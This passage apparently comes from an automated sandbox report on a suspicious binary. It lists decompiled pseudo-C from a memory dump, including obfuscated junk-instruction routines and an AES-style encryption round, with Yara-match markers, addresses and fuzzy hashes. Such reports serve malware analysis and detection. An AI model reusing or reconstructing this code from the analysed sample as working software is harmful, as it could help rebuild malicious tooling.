											__esp = __esp | 0x814dceb8;
											__ebx = __ebx;
											_push(__edx);
											asm("movsw");
											if(( *0xb30f04c1 & __ecx) != 0) {
												goto L1;
											} else {
												__esi =  *0xcdf1f97b;
												__ecx =  *0xe3ca431;
												 *0x181862b8 =  *0x181862b8 | __eax;
												_pop( *0x58de3926);
												asm("rol dword [0xfc883437], 0xf6");
												__eax = __eax ^  *0x42989a9d;
												__ebx = __ebx |  *0x6fb04136;
												asm("adc dl, 0xb3");
												_pop(__eax);
												 *0x9225eaa1 =  *0x9225eaa1 << 0xdf;
												asm("sbb ebx, [0x1d2b030d]");
												asm("rcl dword [0xfb0b773b], 0xd7");
												asm("rcl dword [0x515dc7cb], 0x77");
												__eax = __eax + 0x2f47e0dd;
												 *0xcd9753d9 =  *0xcd9753d9 >> 0xab;
												 *0xbf8cf186 =  *0xbf8cf186 << 0x52;
												__bl = __bl - 0x32;
												asm("rol byte [0x8bf18f3c], 0xb4");
												__edx =  *0xeb76630f;
												__edi = __edi -  *0xa4c29a9b;
												asm("sbb dh, 0x3c");
												asm("adc ebp, [0xc62b80e]");
												__eax = __eax -  *0xbe3684d6;
												asm("cmpsw");
												__eax = __eax |  *0x8ca89323;
												_pop(__eax);
												__esp = __esp -  *0x2615d70b;
												_push(__eax);
												__ebp = __ebp - 1;
												 *0x404156c6 =  *0x404156c6 & __bl;
												__edi = __edi & 0xff8459a9;
												asm("adc ebx, 0x2c1469c7");
												__esi =  *0x341de623;
												__eax = __eax + 1;
												__bl = __bl &  *0xc3a1120a;
												 *0x45dc323c =  *0x45dc323c + __ch;
												__esi =  *0x341de623 + 1;
												asm("lodsd");
												_push(__esp);
												asm("cmpsw");
												__ch = 0xf9;
												__dl = __dl & 0x000000e3;
												__edi = __edi - 0xda133add;
												asm("adc ecx, [0x6babb795]");
												__ecx =  *0xe3ca431 + 1;
												 *0x847f8dd5 =  *0x847f8dd5 >> 0xe5;
												if( *0x847f8dd5 != 0) {
													goto L1;
												} else {
													__esp = __esp -  *0x55346275;
													asm("sbb edi, [0x60400f81]");
													_push( *0xacc6468f);
													asm("movsb");
													__eax = __eax -  *0xfc4a170f;
													__edx = __edx + 0x2eba62d;
													asm("rol byte [0xa4c49e86], 0xe7");
													asm("rcl byte [0x62b80e3c], 0x23");
													__eax = __eax |  *0xa5a58f0d;
													asm("rcl byte [0xccc8d030], 0xe1");
													__ecx = __ecx - 0x435ef32f;
													__bl = __bl &  *0xae0f2b10;
													__edx = __edx & 0xcc5ee3d3;
													asm("lodsb");
													_pop(__edx);
													__edi = __edi - 1;
													__eax = __eax &  *0x9f5cbaea;
													asm("adc [0xa4f0f89a], edx");
													_pop(__esp);
													__ebx = __ebx + 1;
													 *0xe647d5d9 =  *0xe647d5d9 << 0xc7;
													 *0x75ceabf5 =  *0x75ceabf5 >> 0x35;
													asm("movsb");
													__bh = __bh | 0x000000b7;
													__ebx = __ebx &  *0xab6890a3;
													L1();
													_push( *0x19eccefe);
													asm("stosb");
													__edi = __edi | 0xf116aa1e;
													_pop( *0xb216ca0f);
													_pop( *0x316a1809);
													__ecx = 0xf8713ffe;
													__edx = __edx &  *0xff1b711b;
													__cl = __cl &  *0xdb4aec1c;
													__eax = __eax &  *0x1c5915ba;
													__esp = __esp &  *0x941847d9;
													 *0xff145d0 =  *0xff145d0 ^ __cl;
													__edi = 0x1de678d6;
													__bh =  *0xe0a4034;
													__ecx = 0x58411a0a;
													__esi = 0xf8713ffe;
													_pop(__esp);
													if(( *0x25658bdd & 0x560a54d6) < 0) {
														goto L1;
														do {
															do {
																do {
																	do {
																		do {
																			goto L1;
																		} while (_t80 != 0);
																		_pop(_t90);
																		 *0x9b43710d =  *0x9b43710d >> 0x59;
																		_t96 = (_t96 & 0xec6820a1) +  *0x8dca0c2b + 1;
																		asm("ror dword [0xaa6cd8fc], 0x15");
																		 *0x74f8a804 =  *0x74f8a804 & _t68;
																		 *0x5b0f1f05 = _t68;
																		asm("adc ecx, 0x8c0ee43d");
																		 *0x2bfa1939 = _t101;
																		 *0xed478613 = _t80 &  *0x3e5484fc & 0x610dd78c;
																		_t75 = _t75 ^ 0xb71d1f16 |  *0x951ec62f;
																		 *0xfa5521d2 =  *0xfa5521d2 << 0xea;
																		_t56 = _t56 + 2 &  *0x10814be3;
																		asm("sbb [0xf9062aa2], bl");
																		asm("adc bh, [0x41608722]");
																		_t105 = 0x7c387416;
																		 *0x809b9ef =  *0xed478613;
																		asm("adc esp, [0xf6102665]");
																		_t80 = _t90;
																		 *0x8ebbace3 =  *0x8ebbace3 << 0xae;
																		 *0x70a50ad7 =  *0x70a50ad7 - _t80;
																		_push(_t90 + 1);
																		_t68 =  *0x5b0f1f05 - 0x0000000a ^  *0x906b64d2;
																		_t101 =  *0xab99e09;
																		 *0xab99e09 =  *0x2bfa1939;
																	} while (_t68 >= 0);
																	 *0xb99f09b7 =  *0xb99f09b7 ^ _t68;
																	asm("adc eax, [0xf7196c7]");
																	 *0x1262affc =  *0x1262affc >> 0xdc;
																	_t75 = _t75 -  *0x1c4badca;
																	asm("rcr dword [0x92772366], 0x3f");
																	_t80 = 0x7c387416;
																	asm("rcr dword [0xd5227b61], 0x58");
																	_t56 =  *0xfd3b2b3a;
																	 *0xfd3b2b3a =  *0x6254f17d * 0x00009f21 |  *0x337b9033;
																} while (_t75 >= 0);
																asm("rol byte [0x4c68f784], 0x8d");
																_pop(_t56);
																 *0x206342b0 =  *0x206342b0 << 0x5c;
																asm("rcr byte [0x4eac7ee7], 0x86");
																_t68 =  *0x91e576a * 0xa901;
																_push(0x2f663016);
																_t80 =  *0x5f48636b * 0x00005555 &  *0x74c95ceb;
																asm("sbb ebx, [0x31369c6e]");
																_t105 = (0x7c387416 &  *0xee2a260f) +  *0x50472a93;
																_t96 = _t96 - 1;
															} while (_t96 != 0);
															asm("adc esi, [0xcdd02e7a]");
															_t56 = _t56 + 0x347ded17;
														} while (0x2f663016 != 0);
														 *0x9048b5dd =  *0x9048b5dd >> 0x4e;
														 *0xb06d5ff4 =  *0xb06d5ff4 | _t68;
														 *0x591ac92e =  *0x591ac92e << 0xcc;
														 *0x95d3f14 = _t80;
														asm("lodsb");
														 *0xfd7e63c6 =  *0xfd7e63c6 | _t56;
														 *0xb5e49981 =  *0xb5e49981 + _t96 - 0x520b7c0f;
														asm("sbb [0xe8fcc704], ah");
														return _t56 - 0x8016fbf1;
													} else {
														__edi = 0x1de678d6 |  *0xb5069978;
														asm("sbb ebp, 0x9f0ad713");
														__al = __al | 0x00000076;
														return __eax;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}














                                    0x0041d9dd
                                    0x0041d9e3
                                    0x0041d9ec
                                    0x0041d9f2
                                    0x0041d9f9
                                    0x0041da09
                                    0x0041da0f
                                    0x0041da15
                                    0x0041da1b
                                    0x0041da21
                                    0x0041da27
                                    0x0041da2d
                                    0x0041da33
                                    0x0041da3a
                                    0x0041da3b
                                    0x0041da42
                                    0x0041da49
                                    0x0041da54
                                    0x0041da56
                                    0x0041da5d
                                    0x0041da63
                                    0x0041da6a
                                    0x0041da76
                                    0x0041da7c
                                    0x0041da82
                                    0x0041da85
                                    0x0041da86
                                    0x0041da8c
                                    0x0041da8d
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfac
                                    0x0041da93
                                    0x0041da93
                                    0x0041da99
                                    0x0041da9f
                                    0x0041daa7
                                    0x0041daad
                                    0x0041dab3
                                    0x0041dab9
                                    0x0041dabf
                                    0x0041dac5
                                    0x0041dac8
                                    0x0041dad8
                                    0x0041dade
                                    0x0041dae4
                                    0x0041daeb
                                    0x0041daec
                                    0x00000000
                                    0x0041daf2
                                    0x0041daf2
                                    0x0041daf8
                                    0x0041dafb
                                    0x0041db01
                                    0x0041db07
                                    0x0041db13
                                    0x0041db1a
                                    0x0041db20
                                    0x0041db26
                                    0x0041db2c
                                    0x0041db33
                                    0x0041db3a
                                    0x0041db40
                                    0x0041db46
                                    0x0041db4c
                                    0x00000000
                                    0x0041db52
                                    0x0041db52
                                    0x0041db58
                                    0x0041db5e
                                    0x0041db5f
                                    0x0041db66
                                    0x0041db6c
                                    0x0041db78
                                    0x0041db7e
                                    0x0041db85
                                    0x0041db8c
                                    0x0041db92
                                    0x0041db9b
                                    0x0041dba1
                                    0x0041dba7
                                    0x0041dbad
                                    0x0041dbb3
                                    0x0041dbb3
                                    0x0041dbb3
                                    0x0041dbc0
                                    0x0041dbc1
                                    0x0041dbc3
                                    0x0041dbc9
                                    0x0041dbcf
                                    0x0041dbd5
                                    0x0041dbdb
                                    0x0041dbe1
                                    0x0041dbe7
                                    0x00000000
                                    0x0041dbed
                                    0x0041dbed
                                    0x0041dbf7
                                    0x0041dbfd
                                    0x0041dc0a
                                    0x0041dc0b
                                    0x0041dc12
                                    0x0041dc18
                                    0x0041dc1e
                                    0x00000000
                                    0x0041dc24
                                    0x0041dc24
                                    0x0041dc2a
                                    0x0041dc30
                                    0x0041dc36
                                    0x0041dc3d
                                    0x0041dc43
                                    0x0041dc49
                                    0x0041dc4f
                                    0x0041dc55
                                    0x0041dc56
                                    0x0041dc5c
                                    0x0041dc62
                                    0x0041dc6c
                                    0x0041dc72
                                    0x0041dc73
                                    0x0041dc7b
                                    0x0041dc81
                                    0x0041dc81
                                    0x0041dc81
                                    0x0041dc87
                                    0x0041dc8d
                                    0x0041dc93
                                    0x0041dc99
                                    0x00000000
                                    0x0041dc9f
                                    0x0041dc9f
                                    0x0041dca9
                                    0x0041dcb0
                                    0x0041dcb6
                                    0x0041dcbc
                                    0x0041dcbd
                                    0x0041dcc3
                                    0x0041dcc9
                                    0x0041dccf
                                    0x0041dcd5
                                    0x0041dcdb
                                    0x0041dce2
                                    0x0041dce5
                                    0x0041dce6
                                    0x0041dcec
                                    0x00000000
                                    0x0041dcf2
                                    0x0041dcf2
                                    0x0041dcf8
                                    0x0041dd04
                                    0x0041dd0b
                                    0x0041dd11
                                    0x0041dd18
                                    0x0041dd1f
                                    0x0041dd20
                                    0x0041dd26
                                    0x0041dd2d
                                    0x0041dd33
                                    0x0041dd39
                                    0x0041dd3f
                                    0x0041dd45
                                    0x0041dd4c
                                    0x0041dd59
                                    0x0041dd5a
                                    0x0041dd60
                                    0x0041dd67
                                    0x0041dd73
                                    0x0041dd74
                                    0x0041dd7b
                                    0x0041dd81
                                    0x0041dd8d
                                    0x0041dd94
                                    0x0041dd9a
                                    0x0041dd9b
                                    0x0041dd9c
                                    0x0041dda4
                                    0x00000000
                                    0x0041ddaa
                                    0x0041ddaa
                                    0x0041ddb6
                                    0x0041ddbc
                                    0x0041ddc2
                                    0x0041ddc8
                                    0x0041ddcf
                                    0x0041ddd5
                                    0x0041dde1
                                    0x0041ddea
                                    0x0041ddeb
                                    0x0041ddf8
                                    0x0041ddfe
                                    0x0041de05
                                    0x0041de0c
                                    0x0041de11
                                    0x0041de18
                                    0x0041de1f
                                    0x0041de28
                                    0x0041de2f
                                    0x0041de3a
                                    0x0041de40
                                    0x0041de43
                                    0x0041de49
                                    0x0041de4f
                                    0x0041de51
                                    0x0041de57
                                    0x0041de58
                                    0x0041de5e
                                    0x0041de5f
                                    0x0041de60
                                    0x0041de66
                                    0x0041de6c
                                    0x0041de72
                                    0x0041de78
                                    0x0041de79
                                    0x0041de7f
                                    0x0041de85
                                    0x0041de86
                                    0x0041de8d
                                    0x0041de8e
                                    0x0041de90
                                    0x0041de92
                                    0x0041de95
                                    0x0041de9b
                                    0x0041dea1
                                    0x0041dea2
                                    0x0041dea9
                                    0x00000000
                                    0x0041deaf
                                    0x0041deaf
                                    0x0041debb
                                    0x0041dec1
                                    0x0041decd
                                    0x0041ded4
                                    0x0041deda
                                    0x0041dee0
                                    0x0041dee7
                                    0x0041deee
                                    0x0041def4
                                    0x0041defb
                                    0x0041df01
                                    0x0041df07
                                    0x0041df0d
                                    0x0041df0e
                                    0x0041df0f
                                    0x0041df10
                                    0x0041df1c
                                    0x0041df22
                                    0x0041df23
                                    0x0041df24
                                    0x0041df2b
                                    0x0041df32
                                    0x0041df33
                                    0x0041df36
                                    0x0041df3c
                                    0x0041df47
                                    0x0041df4d
                                    0x0041df4e
                                    0x0041df54
                                    0x0041df5a
                                    0x0041df60
                                    0x0041df65
                                    0x0041df6b
                                    0x0041df71
                                    0x0041df77
                                    0x0041df7d
                                    0x0041df89
                                    0x0041df8f
                                    0x0041df96
                                    0x0041df9d
                                    0x0041dfa4
                                    0x0041dfa5
                                    0x00000000
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x0041cfa6
                                    0x00000000
                                    0x00000000
                                    0x0041cfb7
                                    0x0041cfb8
                                    0x0041cfd3
                                    0x0041cfd5
                                    0x0041cfe8
                                    0x0041cfee
                                    0x0041d000
                                    0x0041d006
                                    0x0041d00c
                                    0x0041d012
                                    0x0041d01f
                                    0x0041d026
                                    0x0041d02c
                                    0x0041d047
                                    0x0041d04d
                                    0x0041d053
                                    0x0041d059
                                    0x0041d05f
                                    0x0041d066
                                    0x0041d06d
                                    0x0041d073
                                    0x0041d074
                                    0x0041d07a
                                    0x0041d07a
                                    0x0041d07a
                                    0x0041d090
                                    0x0041d09c
                                    0x0041d0a9
                                    0x0041d0b6
                                    0x0041d0bc
                                    0x0041d0c3
                                    0x0041d0c4
                                    0x0041d0cb
                                    0x0041d0cb
                                    0x0041d0cb
                                    0x0041d0f8
                                    0x0041d0ff
                                    0x0041d106
                                    0x0041d10d
                                    0x0041d11a
                                    0x0041d124
                                    0x0041d125
                                    0x0041d12b
                                    0x0041d131
                                    0x0041d137
                                    0x0041d137
                                    0x0041d13e
                                    0x0041d144
                                    0x0041d144
                                    0x0041d155
                                    0x0041d163
                                    0x0041d169
                                    0x0041d170
                                    0x0041d191
                                    0x0041d192
                                    0x0041d198
                                    0x0041d19e
                                    0x0041d1a9
                                    0x0041dfab
                                    0x0041dfab
                                    0x0041dfb1
                                    0x0041dfb7
                                    0x0041dfb9
                                    0x0041dfb9
                                    0x0041dfa5
                                    0x0041dea9
                                    0x0041dda4
                                    0x0041dcec
                                    0x0041dc99
                                    0x0041dc1e
                                    0x0041dbe7
                                    0x0041db4c
                                    0x0041daec

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +A!
                                    • API String ID: 0-3827699015
                                    • Opcode ID: b205966ad98cd51c897a829381ed5bd6fd86f4d0e85aad6ce265eab5c9c0417a
                                    • Instruction ID: c16755352ad79140925b52736a6c4c9e12d15fb35e7eeb1209927fe1734159d6
                                    • Opcode Fuzzy Hash: b205966ad98cd51c897a829381ed5bd6fd86f4d0e85aad6ce265eab5c9c0417a
                                    • Instruction Fuzzy Hash: B6126432919781CFD712DF38DD8AB423FB2F382320748464ED9A197592D734216ACF88
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407AFE, Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: m6t~
                                    • API String ID: 0-872450345
                                    • Opcode ID: 9fe6a4f8be3beb5c6f3446592b86f21b079c927220d83f2e8e2b9c7022c8fcde
                                    • Instruction ID: a3be2bff907c6d5f62aaddc72bf6df83a54b918b609c01eaeb3f3ebaf8aa5bcb
                                    • Opcode Fuzzy Hash: 9fe6a4f8be3beb5c6f3446592b86f21b079c927220d83f2e8e2b9c7022c8fcde
                                    • Instruction Fuzzy Hash: DFC08027E4A14C15D511494C78403F9F378DB43175E2036CBDC04B75644443D451018D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00402FB0, Relevance: .4, Instructions: 435COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 26%
                                    			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                    0x00402fb0
                                    0x00402fbf
                                    0x00402fc8
                                    0x00402fd6
                                    0x00402fda
                                    0x00402fe3
                                    0x00402ff4
                                    0x00402ff7
                                    0x00402ffc
                                    0x00403005
                                    0x00403013
                                    0x00403018
                                    0x00403021
                                    0x00403031
                                    0x00403051
                                    0x00403054
                                    0x00403066
                                    0x0040306b
                                    0x00403080
                                    0x0040309d
                                    0x004030a0
                                    0x004030b1
                                    0x004030c6
                                    0x004030e6
                                    0x004030e9
                                    0x004030fb
                                    0x00403119
                                    0x00403136
                                    0x00403139
                                    0x0040314b
                                    0x00403160
                                    0x00403166
                                    0x0040316e
                                    0x0040316f
                                    0x00403172
                                    0x00403180
                                    0x00403190
                                    0x004031a2
                                    0x004031b4
                                    0x004031d0
                                    0x004031e3
                                    0x004031f0
                                    0x00403201
                                    0x00403218
                                    0x0040323a
                                    0x0040323d
                                    0x0040324e
                                    0x00403269
                                    0x00403280
                                    0x00403283
                                    0x00403295
                                    0x0040329d
                                    0x004032b2
                                    0x004032cf
                                    0x004032d2
                                    0x004032e3
                                    0x00403307
                                    0x00403317
                                    0x0040331a
                                    0x0040332c
                                    0x00403344
                                    0x00403347
                                    0x0040335a
                                    0x00403367
                                    0x00403379
                                    0x00403391
                                    0x004033b4
                                    0x004033b7
                                    0x004033c9
                                    0x004033de
                                    0x004033e4
                                    0x004033e4
                                    0x004033e7
                                    0x004033e7
                                    0x00403180
                                    0x0040344b
                                    0x00403454
                                    0x00403462
                                    0x004034c0
                                    0x004034c9
                                    0x004034d7
                                    0x00403539
                                    0x00403542
                                    0x0040354f
                                    0x00403552
                                    0x0040359e
                                    0x004035aa
                                    0x004035b3
                                    0x004035c0
                                    0x004035c7

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                    • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                    • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                    • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041D3C4, Relevance: .4, Instructions: 393COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E0041D3C4(signed char __eax, signed char __ebx, void* __ecx, signed char __edx, void* __edi, signed int __esi) {
				signed char _t60;
				signed char _t67;
				signed int _t72;
				signed char _t75;
				void* _t83;
				signed int _t87;
				void* _t91;
				intOrPtr _t92;
				intOrPtr _t93;

				_t87 = __esi;
				_t75 = __edx;
				_t67 = __ebx;
				_t60 = __eax;
				_t72 = __ecx -  *0x986e44e9;
				asm("rcl dword [0x21c63e15], 0x5f");
				asm("sbb [0xc832470c], bh");
				_t92 = _t91 - 0x5cc73b05;
				_t93 =  *0x6065d097;
				 *0x6065d097 = _t92;
				if(_t92 < 0) {
					__edi = __edi -  *0x50262079;
					__esp = __esp ^  *0x8800de3f;
					_t18 = __esi;
					__esi =  *0xea5fc9db;
					 *0xea5fc9db = _t18;
					__edx = __edx + 1;
